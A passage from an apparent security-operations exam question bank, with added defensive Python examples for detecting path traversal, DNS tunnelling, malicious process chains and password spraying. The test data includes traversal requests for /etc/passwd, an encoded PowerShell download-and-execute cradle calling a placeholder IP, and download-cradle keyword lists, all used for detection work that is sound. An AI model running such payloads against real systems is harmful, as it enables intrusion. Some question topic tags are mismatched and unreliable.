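    "GET /../../etc/passwd HTTP/1.1",
    "GET /images/..%2f..%2fetc%2fpasswd HTTP/1.1",
    "GET /static/%252e%252e/%252e%252e/etc/passwd HTTP/1.1",
    "GET /docs/../index.html HTTP/1.1",
    "GET /index.html?page=home HTTP/1.1",
]


def normalize_request_path(raw_path, max_decode_rounds=3):
    """Decode and collapse a request path the way a naive server would.
    Returns (resolved_path, escaped_root); escaped_root is True when '..'
    segments climb above the document root at any point."""
    path = raw_path.split("?", 1)[0]
    # Decode until stable: %252e%252e becomes %2e%2e, then .. on the second pass,
    # which is exactly how double encoding slips past single-pass filters.
    for _ in range(max_decode_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    path = path.replace("\\", "/").lstrip("/")   # backslash variants target Windows-hosted apps

    depth, escaped = 0, False
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            escaped = escaped or depth < 0
        else:
            depth += 1
    # normpath drops '..' that would climb above '/', so this is the file a
    # root-relative open() would actually touch.
    return posixpath.normpath("/" + path), escaped


def classify_request(request_line):
    """'METHOD PATH HTTP/x.y' -> ('path-traversal' | 'ok', resolved_path)."""
    _method, path, _version = request_line.split(" ", 2)
    resolved, escaped = normalize_request_path(path)
    return ("path-traversal" if escaped else "ok", resolved)


def flagged_requests(lines=REQUEST_LINES):
    """Return [(request_line, resolved_path)] for lines that escape the web root."""
    out = []
    for line in lines:
        verdict, resolved = classify_request(line)
        if verdict == "path-traversal":
            out.append((line, resolved))
    return out
```

A flagged line proves an attempt, not a success. Whether `/etc/passwd` was actually served depends on the application's own path handling, so pair the request with its response status and byte count (a 200 with a few hundred bytes is a very different finding from a 404) before escalating.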

Question 145 (easy, multiple choice)
Read the full Security Operations explanation →

A security engineer needs to implement a baseline configuration for all new Linux servers. Which of the following should be included in the baseline to reduce the attack surface?

Question 146 (hard, multiple choice)
Read the full DNS explanation →

During a threat hunting exercise, an analyst formulates a hypothesis that an attacker may be using DNS tunneling to exfiltrate data. Which data source would provide the best evidence to confirm or deny this hypothesis?
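A worked example of testing this hypothesis against resolver query logs, added here and not part of the original question bank; it also covers the DNS tunnelling alert in Question 124. The query log is constructed, and the `exfil-test.net` labels are invented to look like encoded data chunks. Tunnelled data shows up as many unique, long, high-entropy subdomains under one registered domain from one client, so the code scores each (client, domain) pair on all three at once rather than on any single one:

```python
import math
from collections import Counter, defaultdict

# Constructed DNS query log as (client ip, queried name). Not real traffic.
DNS_QUERIES = [
    ("10.0.0.5", "www.example.com"),
    ("10.0.0.5", "mail.example.com"),
    ("10.0.0.5", "cdn-assets.example.com"),
    ("10.0.0.9", "k3n8p2qw7z.x4vb9try5m.exfil-test.net"),
    ("10.0.0.9", "q7m2z9bx4k.w1nv5tp8rj.exfil-test.net"),
    ("10.0.0.9", "h6d1f3gs9w.c5ya8zb2pe.exfil-test.net"),
    ("10.0.0.9", "r4t8ux2kq7.m9sj3dn1vc.exfil-test.net"),
    ("10.0.0.9", "b5zp1mw6ek.y2gt7hx9qa.exfil-test.net"),
    ("10.0.0.9", "www.example.com"),
]


def shannon_entropy(text):
    """Bits per character; encoded or encrypted chunks sit near the alphabet's maximum."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(name):
    """Naive split on the last two labels. Production code should use the Public
    Suffix List so that names like example.co.uk are handled correctly."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:])


def tunnel_candidates(queries, min_unique_subdomains=4, min_avg_payload_len=16,
                      min_avg_entropy=3.5):
    """Group queries per (client, registered domain) and flag pairs whose
    subdomains are numerous, long and high-entropy at the same time."""
    stats = defaultdict(lambda: {"subs": set(), "lens": [], "ents": []})
    for client, name in queries:
        domain = registered_domain(name)
        sub = name[: -len(domain) - 1] if name.endswith("." + domain) else ""
        if not sub:
            continue
        s = stats[(client, domain)]
        s["subs"].add(sub)
        payload = sub.replace(".", "")        # label separators carry no data
        s["lens"].append(len(payload))
        s["ents"].append(shannon_entropy(payload))

    findings = []
    for (client, domain), s in stats.items():
        n = len(s["subs"])
        avg_len = sum(s["lens"]) / len(s["lens"])
        avg_ent = sum(s["ents"]) / len(s["ents"])
        if (n >= min_unique_subdomains and avg_len >= min_avg_payload_len
                and avg_ent >= min_avg_entropy):
            findings.append({"client": client, "domain": domain,
                             "unique_subdomains": n,
                             "avg_payload_len": round(avg_len, 1),
                             "avg_entropy": round(avg_ent, 2)})
    return sorted(findings, key=lambda f: (f["client"], f["domain"]))
```

The thresholds are starting points, not constants. Legitimate services also put hashes in labels (CDN cache keys, antivirus and reputation lookups), so build an allowlist of those domains from a baseline period before trusting the output; the hunt confirms the hypothesis only when the flagged domain is one nobody in the estate has a reason to resolve.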

Question 147 (easy, multi select)
Read the full Security Operations explanation →

Which TWO of the following are common indicators of compromise (IOCs) that can be identified through log analysis?

Question 148 (medium, multi select)
Read the full Security Operations explanation →

Which THREE of the following are essential tools and technologies used in a Security Operations Center (SOC) for monitoring and detection?

Question 149 (hard, multi select)
Read the full Security Operations explanation →

An organization has identified a ransomware outbreak on several workstations. Which TWO actions should the incident response team take immediately?

Question 150 (medium, multiple choice)
Read the full Security Operations explanation →

An analyst is investigating network performance issues on a Linux server. The exhibit shows output from ethtool. Based on the exhibit, which type of issue is most likely affecting the server's network performance?

Exhibit

```
ethtool -S eth0 | grep -E "(rx_crc_errors|rx_fifo_errors|rx_frame_errors)"
rx_crc_errors: 2451
rx_fifo_errors: 12
rx_frame_errors: 892
```
Question 151 (hard, multiple choice)
Read the full Security Operations explanation →

A security analyst is reviewing an S3 bucket policy for an AWS environment. What is the net effect of the policy shown in the exhibit on requests from an IP address in the 10.0.0.0/8 range?

Exhibit

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": "s3:GetObject",
      "Resource": "arn:aws:s3:::confidential-data/*",
      "Condition": {
        "IpAddress": {
          "aws:SourceIp": "10.0.0.0/8"
        }
      }
    },
    {
      "Effect": "Deny",
      "Action": "s3:*",
      "Resource": "arn:aws:s3:::confidential-data/*"
    }
  ]
}
```
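A worked example of how the exhibit's policy evaluates, added here and not part of the original question bank. The evaluator implements the rule that matters for this question: an applicable explicit Deny wins regardless of statement order, an applicable Allow permits, and anything else is implicitly denied. `EXHIBIT_POLICY` is the exhibit copied verbatim; `CORRECTED_POLICY` is an assumed fix (not from the page) that scopes the Deny with `NotIpAddress` so it only bites requests from outside the corporate range. Only the two IP condition operators the example needs are implemented:

```python
import fnmatch
import ipaddress

# The bucket policy from the exhibit.
EXHIBIT_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": "s3:GetObject",
         "Resource": "arn:aws:s3:::confidential-data/*",
         "Condition": {"IpAddress": {"aws:SourceIp": "10.0.0.0/8"}}},
        {"Effect": "Deny", "Action": "s3:*",
         "Resource": "arn:aws:s3:::confidential-data/*"},
    ],
}

# Assumed correction (not from the page): deny only when the caller is NOT in range.
CORRECTED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        EXHIBIT_POLICY["Statement"][0],
        {"Effect": "Deny", "Action": "s3:*",
         "Resource": "arn:aws:s3:::confidential-data/*",
         "Condition": {"NotIpAddress": {"aws:SourceIp": "10.0.0.0/8"}}},
    ],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def _condition_met(condition, context):
    """Supports only the IpAddress / NotIpAddress operators used in this example."""
    for operator, pairs in condition.items():
        if operator not in ("IpAddress", "NotIpAddress"):
            raise NotImplementedError(operator)
        for key, cidrs in pairs.items():
            ip = ipaddress.ip_address(context[key])
            in_range = any(ip in ipaddress.ip_network(c) for c in _as_list(cidrs))
            if operator == "IpAddress" and not in_range:
                return False
            if operator == "NotIpAddress" and in_range:
                return False
    return True


def evaluate(policy, action, resource, context):
    """Simplified IAM logic: an applicable explicit Deny always wins, otherwise an
    applicable Allow permits, otherwise the request is implicitly denied."""
    allowed = False
    for st in policy["Statement"]:
        # IAM action matching is case-insensitive and accepts * and ? wildcards
        if not any(fnmatch.fnmatchcase(action.lower(), a.lower()) for a in _as_list(st["Action"])):
            continue
        if not any(fnmatch.fnmatchcase(resource, r) for r in _as_list(st["Resource"])):
            continue
        if not _condition_met(st.get("Condition", {}), context):
            continue
        if st["Effect"] == "Deny":
            return "Deny"
        allowed = True
    return "Allow" if allowed else "ImplicitDeny"
```

Two caveats a reviewer would raise against the exhibit itself: a bucket (resource-based) policy must carry a `Principal` element, which the exhibit omits, and `aws:SourceIp` does not match requests that arrive through a VPC endpoint, for which `aws:VpcSourceIp` is the relevant key.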
Question 152 (hard, multiple choice)
Read the full Security Operations explanation →

You are a senior security analyst at a mid-sized financial company. The SOC has been alerted by the EDR system about anomalous behavior on a domain controller (DC) that runs Windows Server 2019. The alert indicates that a process named 'svchost.exe' spawned a PowerShell process that executed a one-liner to connect to an external IP address (203.0.113.5) over TCP port 443. Further investigation shows that the DC's event logs have gaps of about 10 minutes each, and the local administrator account 'Administrator' was used to log in from a workstation named 'WKSTN-FIN-12' at the time of the event. The company has strict policies: all administrative access must be via dedicated jump hosts, and privileged accounts are monitored. Upon checking, 'WKSTN-FIN-12' is assigned to an employee in the finance department who has no administrative privileges. The employee reports that they did not log in recently. The CISO wants a swift containment and eradication without losing forensic evidence. Based on this scenario, which of the following is the BEST first course of action?

Question 153 (medium, multiple choice)
Read the full Security Operations explanation →

A security analyst at a small company notices that several workstations in the finance department are communicating with an external IP address known to be associated with a command-and-control server. The analyst checks the host-based firewall logs and sees that outbound connections to that IP are allowed. Which of the following is the BEST immediate action to take?

Question 154 (hard, multiple choice)
Read the full NAT/PAT explanation →

During a security assessment, you discover that an organization's web application is vulnerable to SQL injection because it concatenates user input directly into SQL queries. Which of the following is the BEST remediation strategy?

Question 155 (medium, multi select)
Read the full Security Operations explanation →

A security analyst is reviewing logs from a network intrusion detection system (NIDS) and sees the following alert: "ET TROJAN Possible ZeuS/Poison Ivy Activity". The analyst wants to verify if the traffic is malicious. Which TWO of the following actions should the analyst take? (Select two.)

Question 156 (easy, multiple choice)
Read the full Security Operations explanation →

A small business with 50 employees uses a single Windows Server 2019 as a domain controller and file server. The company recently experienced a ransomware attack that encrypted all files on the server. The IT manager restored the files from a backup that was taken two days before the attack. However, the next day, the files were encrypted again. The analyst suspects the ransomware may have persisted or re-entered. The network is air-gapped from the internet, but employees use USB drives. Which of the following is the MOST likely reason for the re-infection?

Question 157 (medium, multiple choice)
Read the full Security Operations explanation →

A security operations center (SOC) analyst is investigating an alert from the endpoint detection and response (EDR) system indicating that a process named "svchost.exe" spawned from a parent process "cmd.exe" on a user workstation. The user is a software developer who frequently uses command-line tools. The analyst checks the command line arguments: "cmd.exe /c powershell -EncodedCommand ...". The encoded command decodes to a script that downloads a payload from a remote server and executes it. The analyst also sees that the workstation has established an outbound connection to the same server on port 443. Which of the following is the BEST immediate action?
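A worked example of triaging process-creation records like the one in this stem, added here and not part of the original question bank. It serves three stems at once: the event 4688 exhibit in Question 137 (`svchost.exe` launching from a user's Temp directory), the Office-document-to-`wscript.exe` chain in Question 96, and the encoded PowerShell command here. `EXHIBIT_4688` reproduces the fields of the Question 137 exhibit; the other three events are constructed, and the encoded script, the `203.0.113.5` URL and the file paths in them are invented:

```python
import base64
import binascii

SYSTEM_DIRS = {"c:\\windows\\system32", "c:\\windows\\syswow64"}
SYSTEM_BINARIES = {"svchost.exe", "rundll32.exe", "lsass.exe", "csrss.exe",
                   "services.exe", "winlogon.exe", "explorer.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe", "mshta.exe"}
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "iwr ",
                  "net.webclient", "invoke-expression", "iex ")


def _split_path(path):
    """'C:\\Dir\\x.exe' -> ('c:\\dir', 'x.exe'), lower-cased for comparison."""
    directory, _, name = path.lower().rpartition("\\")
    return directory, name


def decode_encoded_command(command_line):
    """Return the decoded script if the command line carries -EncodedCommand
    (powershell.exe accepts any prefix from -e upwards), else None.
    The payload is base64 over UTF-16LE, not UTF-8."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        t = tok.lower()
        if t.startswith("-") and len(t) >= 2 and "-encodedcommand".startswith(t):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return None
    return None


def triage_process_event(event):
    """Apply masquerading, parent/child and encoded-command checks to a 4688-style
    record. Returns {'rules': [...], 'decoded_command': str | None}."""
    child_dir, child = _split_path(event["NewProcessName"])
    parent_dir, parent = _split_path(event["CreatorProcessName"])
    rules = []
    if child in SYSTEM_BINARIES and child_dir not in SYSTEM_DIRS:
        rules.append("system-binary-name-outside-system-dir")
    if parent in SYSTEM_BINARIES and parent_dir not in SYSTEM_DIRS:
        rules.append("parent-masquerades-as-system-binary")
    if child == "svchost.exe" and parent != "services.exe":
        rules.append("svchost-not-started-by-services")
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        rules.append("office-app-spawns-script-host")
    decoded = decode_encoded_command(event.get("CommandLine", ""))
    if decoded is not None:
        rules.append("encoded-powershell")
        if any(m in decoded.lower() for m in CRADLE_MARKERS):
            rules.append("download-cradle")
    return {"rules": rules, "decoded_command": decoded}


# Constructed events. EXHIBIT_4688 reproduces the Question 137 exhibit's fields.
EXHIBIT_4688 = {
    "NewProcessName": "C:\\Windows\\System32\\rundll32.exe",
    "CreatorProcessName": "C:\\Users\\admin\\AppData\\Local\\Temp\\svchost.exe",
    "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL",
}
_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/p')"
ENCODED_EVENT = {
    "NewProcessName": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "CreatorProcessName": "C:\\Windows\\System32\\cmd.exe",
    "CommandLine": "powershell -EncodedCommand "
                   + base64.b64encode(_SCRIPT.encode("utf-16-le")).decode(),
}
OFFICE_EVENT = {
    "NewProcessName": "C:\\Windows\\System32\\wscript.exe",
    "CreatorProcessName": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
    "CommandLine": 'wscript.exe "C:\\Users\\jdoe\\AppData\\Local\\Temp\\invoice.js"',
}
BENIGN_EVENT = {
    "NewProcessName": "C:\\Windows\\System32\\svchost.exe",
    "CreatorProcessName": "C:\\Windows\\System32\\services.exe",
    "CommandLine": "C:\\Windows\\System32\\svchost.exe -k netsvcs -p",
}
```

The developer's habit of using `cmd.exe` is why `cmd.exe` spawning `powershell.exe` is deliberately not a rule on its own; the signal in this stem is the encoded command and the download cradle inside it, which the decoder surfaces so the analyst reads the script rather than the base64. Note that 4688 only carries the command line when the "Include command line in process creation events" policy is enabled; without it, the last two rules have nothing to work on.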

Question 158 (hard, multiple choice)
Read the full VPN explanation →

A company uses a SIEM platform that ingests logs from various sources. The SOC team receives an alert for a high number of failed login attempts (over 100 in 5 minutes) on the domain controller from a single IP address. The analyst investigates and finds that the failed attempts are for multiple different usernames, including some disabled accounts. The source IP is traced to an external VPN service. The analyst also notices that a few accounts had successful logins from the same IP after the failed attempts. Which of the following is the MOST likely attack type?
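A worked example of the correlation these stems describe, added here and not part of the original question bank. It covers this question, the multi-account failure burst in Question 140, and the "failures followed by success from the same source" rule in Question 128, which is a temporal sequence correlation keyed on source IP. The authentication events are constructed: `203.0.113.10` sprays one guess across many accounts (including a disabled one) and lands on one, `198.51.100.7` hammers a single account, and `10.10.1.50` is a user mistyping a password twice. The classifier separates spraying from brute force by how many distinct accounts the failures touch:

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed authentication events: (timestamp, source ip, username, outcome).
AUTH_EVENTS = [
    ("2024-03-15T02:00:00", "203.0.113.10", "alice", "fail"),
    ("2024-03-15T02:00:01", "203.0.113.10", "bob", "fail"),
    ("2024-03-15T02:00:02", "203.0.113.10", "carol", "fail"),
    ("2024-03-15T02:00:03", "203.0.113.10", "dave", "fail"),
    ("2024-03-15T02:00:04", "203.0.113.10", "erin", "fail"),
    ("2024-03-15T02:00:05", "203.0.113.10", "frank", "fail"),
    ("2024-03-15T02:00:06", "203.0.113.10", "svc_old_disabled", "fail"),
    ("2024-03-15T02:00:07", "203.0.113.10", "grace", "fail"),
    ("2024-03-15T02:00:12", "203.0.113.10", "dave", "success"),
    ("2024-03-15T03:10:00", "198.51.100.7", "admin", "fail"),
    ("2024-03-15T03:10:01", "198.51.100.7", "admin", "fail"),
    ("2024-03-15T03:10:02", "198.51.100.7", "admin", "fail"),
    ("2024-03-15T03:10:03", "198.51.100.7", "admin", "fail"),
    ("2024-03-15T03:10:04", "198.51.100.7", "admin", "fail"),
    ("2024-03-15T03:10:05", "198.51.100.7", "admin", "fail"),
    ("2024-03-15T08:30:00", "10.10.1.50", "jsmith", "fail"),
    ("2024-03-15T08:30:09", "10.10.1.50", "jsmith", "fail"),
    ("2024-03-15T08:30:20", "10.10.1.50", "jsmith", "success"),
]


def correlate_logons(events, window=timedelta(minutes=5), fail_threshold=5, spray_users=5):
    """Per source IP, slide a time window over the events; when it holds at least
    fail_threshold failures, classify the pattern by how many accounts were hit
    and record any account that succeeded after the failures began."""
    by_source = defaultdict(list)
    for ts, src, user, outcome in events:
        by_source[src].append((datetime.fromisoformat(ts), user, outcome))

    findings = []
    for src, rows in by_source.items():
        rows.sort()
        best, start = None, 0
        for end in range(len(rows)):
            while rows[end][0] - rows[start][0] > window:
                start += 1
            win = rows[start:end + 1]
            fails = [r for r in win if r[2] == "fail"]
            if len(fails) < fail_threshold:
                continue
            # a success only counts as "after failures" if it follows the first one
            first_fail = fails[0][0]
            hits = sorted({r[1] for r in win if r[2] == "success" and r[0] >= first_fail})
            users = {r[1] for r in fails}
            candidate = {
                "source": src,
                "pattern": "password-spray" if len(users) >= spray_users else "brute-force",
                "failures": len(fails),
                "distinct_users": len(users),
                "success_after_failures": hits,
            }
            # keep the richest window per source so each source yields one finding
            if best is None or (len(fails), len(hits)) > (best["failures"], len(best["success_after_failures"])):
                best = candidate
        if best:
            findings.append(best)
    return sorted(findings, key=lambda f: f["source"])
```

Two tuning notes: failures against disabled or non-existent accounts are a strong spray indicator in their own right, since legitimate users rarely hit them, so a production rule should weight them; and many users behind one NAT or VPN egress address will trip the distinct-users threshold, so the `spray_users` value and an allowlist of known egress IPs have to be set per environment.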

Question 159 (easy, multiple choice)
Read the full Security Operations explanation →

A company uses a cloud-based identity provider (IdP) for single sign-on (SSO) to all applications. The SOC receives an alert that a user's account logged in from an IP address associated with a country where the company has no offices. The user is currently on a planned vacation and is not in that country. The analyst reviews the authentication logs and sees the login used a valid token and correct multi-factor authentication (MFA) method. Which of the following is the BEST initial step to handle this alert?

Question 160 (easy, multi select)
Read the full Security Operations explanation →

A security analyst is reviewing alerts from an IDS. Which TWO indicators are most likely to suggest a successful command and control (C2) communication? (Choose two.)

Question 161 (medium, multiple choice)
Read the full Security Operations explanation →

Refer to the exhibit. A security analyst is reviewing firewall logs and notices this entry. What should the analyst do next?

Exhibit

# Firewall Log Entry
Time: 2024-03-15 10:23:45
Source IP: 10.10.1.50
Destination IP: 203.0.113.50
Source Port: 49152
Destination Port: 3389
Protocol: TCP
Action: ALLOW
Bytes Sent: 345678
Pkts Sent: 456
Question 162 (hard, multiple choice)
Read the full Security Operations explanation →

A hospital's IT department has been receiving reports from nursing staff that the electronic medical record (EMR) system is responding slowly during peak hours. The network team has verified that the local area network is operating normally and there is no bandwidth congestion. The security analyst reviews the firewall logs and observes repeated outbound connections from the EMR server to an external IP address 198.51.100.23 on TCP port 443 at regular 5-minute intervals. Each connection transfers a small amount of data. The analyst also notes that the EMR server's antivirus software is up to date and no malware has been detected. The hospital's security policy requires that all outbound connections from critical servers be explicitly approved. Further investigation reveals that 198.51.100.23 is associated with a hosting provider in a foreign country. The analyst suspects data exfiltration. Which of the following actions should the analyst take FIRST?
